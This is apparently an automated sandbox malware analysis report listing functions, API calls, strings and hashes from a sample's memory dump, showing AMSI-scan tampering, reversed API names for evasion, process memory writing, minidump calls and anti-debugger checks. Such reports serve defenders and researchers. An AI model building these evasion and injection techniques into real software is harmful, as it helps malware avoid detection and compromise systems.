                                                                                                                                            • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                                                                                          • API String ID: 341001173-1870492900
                                                                                                                                          • Opcode ID: f97e802a66975f8779966bfb0050496485f51a2195183ecafa5dad78b9e2ec2e
                                                                                                                                          • Instruction ID: 0e6f4fe3e6b47f55da2b54a53ae5cec59cb735cd5749c8abba563ca2b414fbcf
                                                                                                                                          • Opcode Fuzzy Hash: f97e802a66975f8779966bfb0050496485f51a2195183ecafa5dad78b9e2ec2e
                                                                                                                                          • Instruction Fuzzy Hash: C2F2EF75B846189FEF11EB65DD90BCEB3F6BF89304F1041A69049AB218DF30AE468F45
                                                                                                                                          Function 02A95ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 10169 2a95acc-2a95b0d GetModuleFileNameA RegOpenKeyExA 10170 2a95b4f-2a95b92 call 2a95908 RegQueryValueExA 10169->10170 10171 2a95b0f-2a95b2b RegOpenKeyExA 10169->10171 10176 2a95b94-2a95bb0 RegQueryValueExA 10170->10176 10177 2a95bb6-2a95bd0 RegCloseKey 10170->10177 10171->10170 10173 2a95b2d-2a95b49 RegOpenKeyExA 10171->10173 10173->10170 10174 2a95bd8-2a95c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10173->10174 10178 2a95c0f-2a95c13 10174->10178 10179 2a95cf2-2a95cf9 10174->10179 10176->10177 10180 2a95bb2 10176->10180 10182 2a95c1f-2a95c35 lstrlenA 10178->10182 10183 2a95c15-2a95c19 10178->10183 10180->10177 10184 2a95c38-2a95c3b 10182->10184 10183->10179 10183->10182 10185 2a95c3d-2a95c45 10184->10185 10186 2a95c47-2a95c4f 10184->10186 10185->10186 10187 2a95c37 10185->10187 10186->10179 10188 2a95c55-2a95c5a 10186->10188 10187->10184 10189 2a95c5c-2a95c82 lstrcpynA LoadLibraryExA 10188->10189 10190 2a95c84-2a95c86 10188->10190 10189->10190 10190->10179 10191 2a95c88-2a95c8c 10190->10191 10191->10179 10192 2a95c8e-2a95cbe lstrcpynA LoadLibraryExA 10191->10192 10192->10179 10193 2a95cc0-2a95cf0 lstrcpynA LoadLibraryExA 10192->10193 10193->10179
                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A90000,02ABE790), ref: 02A95AE8
                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B06
                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B24
                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001), ref: 02A95BA9
                                                                                                                                          • RegCloseKey.ADVAPI32(?,02A95BD8,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A95BF5
                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A95BFB
                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A95C26
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95C6D
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95C7D
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95CA5
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95CB5
                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A95CDB
                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A95CEB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                          • Opcode ID: 28939839391560876a2509a9eaf48af8928128e1af4d379002fa562498d88c9d
                                                                                                                                          • Instruction ID: 91f8effe37962583a818632f2214ea46107db35cf0f45570bfddc18ea6a8d784
                                                                                                                                          • Opcode Fuzzy Hash: 28939839391560876a2509a9eaf48af8928128e1af4d379002fa562498d88c9d
                                                                                                                                          • Instruction Fuzzy Hash: 8F517071E4025D7AFF26D6A58D86FEFB7ED9B04744F8001A1AA04E6181EE749A44CFA0
                                                                                                                                          Function 02AA894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12168 2aa894c-2aa8971 LoadLibraryW 12169 2aa89bb-2aa89c1 12168->12169 12170 2aa8973-2aa898b GetProcAddress 12168->12170 12171 2aa898d-2aa89ac call 2aa7d78 12170->12171 12172 2aa89b0-2aa89b6 FreeLibrary 12170->12172 12171->12172 12175 2aa89ae 12171->12175 12172->12169 12175->12172
                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                          • Opcode ID: aa922a331b9e03c5be5f268622cdfdd685cee05ff3ff7e91f64b08bbc1a0ebc8
                                                                                                                                          • Instruction ID: 375e7038693f1e923f6d8c271ee5894ad44351785043d66ffcc0e945e811e2fe
                                                                                                                                          • Opcode Fuzzy Hash: aa922a331b9e03c5be5f268622cdfdd685cee05ff3ff7e91f64b08bbc1a0ebc8
                                                                                                                                          • Instruction Fuzzy Hash: CBF0C271EC03049EE710A769BD89F57F7DCEB80B94F408D69BD0887148CF741852AB50
                                                                                                                                          Function 02AAF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12185 2aaf744-2aaf75e GetModuleHandleW 12186 2aaf78a-2aaf792 12185->12186 12187 2aaf760-2aaf772 GetProcAddress 12185->12187 12187->12186 12188 2aaf774-2aaf784 CheckRemoteDebuggerPresent 12187->12188 12188->12186 12189 2aaf786 12188->12189 12189->12186
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 02AAF754
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02AAF766
                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02AAF77D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                          • Opcode ID: bbfbdd805826aca46f77e893003a75fd598eee43e453037245a0708a58a201e7
                                                                                                                                          • Instruction ID: 918210257c33f34e34c4cb9440d4ecb5fd6756dfaa3be087214a2866804f509c
                                                                                                                                          • Opcode Fuzzy Hash: bbfbdd805826aca46f77e893003a75fd598eee43e453037245a0708a58a201e7
                                                                                                                                          • Instruction Fuzzy Hash: 16F0A770904248FEEB14A7B888D87ECFBB95F05328F2443909435E35C1EB770680CA91
                                                                                                                                          Function 02AADD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDAB
                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDDB
                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02AADDF0
                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02AADE1C
                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02AADE25
                                                                                                                                            • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                          • Opcode ID: 429593673390f01c063a5b330610aeed0d362e49a0e1526ddf762469c920c06c
                                                                                                                                          • Instruction ID: e13400c7fffb806658955a7883a4074d0d60e1a622a6d8858ab672fd6aa79875
                                                                                                                                          • Opcode Fuzzy Hash: 429593673390f01c063a5b330610aeed0d362e49a0e1526ddf762469c920c06c
                                                                                                                                          • Instruction Fuzzy Hash: E421E071A80709BEEB11EA95CD52FDEB7ADAF48B00F500461B301E7580DF74AA058B94
                                                                                                                                          Function 02AAE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02AAE5F6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                          • Opcode ID: d3f22be55d97564aa8bc82122ec76cead66e58f184b73e0299c99f45466b3325
                                                                                                                                          • Instruction ID: 0eddc6224fcea4d219edb7da31743888b7adef5f21e06164c1fd1a1920280c24
                                                                                                                                          • Opcode Fuzzy Hash: d3f22be55d97564aa8bc82122ec76cead66e58f184b73e0299c99f45466b3325
                                                                                                                                          • Instruction Fuzzy Hash: BD411D75A90248AFEF10EBA9DA51ADEB3FAFF8C704F104436E041A7254DE74AD028F55
                                                                                                                                          Function 02AA7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                          • Opcode ID: 742d31d188f3ea91dc9d776f85773cd34526238241c8e3959c46a42baf693085
                                                                                                                                          • Instruction ID: 04ad797ea940bfaea9401290f9688fa28aade0376696c0be490d7b5351d258b5
                                                                                                                                          • Opcode Fuzzy Hash: 742d31d188f3ea91dc9d776f85773cd34526238241c8e3959c46a42baf693085
                                                                                                                                          • Instruction Fuzzy Hash: 9A110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64
                                                                                                                                          Function 02AA7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                          • Opcode ID: 42b869670b61f886564bd27b43a244be5515e0f46536e85ea6171e16a4d1347c
                                                                                                                                          • Instruction ID: 2647ba031a1c38a3953d0cf44aa726fed76ba51fdcf0c3a707fb999508d70046
                                                                                                                                          • Opcode Fuzzy Hash: 42b869670b61f886564bd27b43a244be5515e0f46536e85ea6171e16a4d1347c
                                                                                                                                          • Instruction Fuzzy Hash: 57110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64
                                                                                                                                          Function 02AA7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                          • Opcode ID: c53333de91fa3d573b471527e04e806a9ea3428949a26faa17a86ee5d537de26
                                                                                                                                          • Instruction ID: ef0f46fceccbe5f677d9978b27796da11b1ddd517faa3ce606eb5e7e15fdd48c
                                                                                                                                          • Opcode Fuzzy Hash: c53333de91fa3d573b471527e04e806a9ea3428949a26faa17a86ee5d537de26
                                                                                                                                          • Instruction Fuzzy Hash: 6901D775680208AFDB10EF99ED61E9FB7EDEB49700F508850B905D7640DF34AE128F64
                                                                                                                                          Function 02AA6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02AA6DB9,?,?,?,00000000), ref: 02AA6D99
                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02AA6EAC,00000000,00000000,02AA6E2B,?,00000000,02AA6E9B), ref: 02AA6E17
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                          • String ID:
